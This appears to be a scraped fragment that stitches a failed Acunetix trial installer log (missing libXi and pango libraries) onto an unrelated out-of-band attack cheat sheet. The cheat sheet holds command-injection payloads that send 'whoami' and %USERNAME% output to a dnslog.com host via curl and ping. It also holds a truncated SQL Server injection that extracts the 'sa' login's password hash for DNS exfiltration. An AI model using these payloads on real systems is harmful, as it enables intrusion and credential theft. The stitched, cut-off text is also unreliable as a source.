执行安装文件 系统报错
[root@qyi-xsser tmp]# ./acunetix_trial.sh
Acunetix Installer Version: v_190515149, Copyright (c) Acunetix
------------------------------------------------------------
Checking os...
Checking for dependencies...
- dependency libXi.so.6 not found on the system
- dependency libpangocairo-1...
0x00 Command Execution
i. *nix:
curl http://ip.port.b182oj.dnslog.com/`whoami`
ping `whoami`.ip.port.b182oj.dnslog.com
ii. windows
ping %USERNAME%.b182oj.dnslog.com
0x01 SQL Injection
i. SQL Server
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'....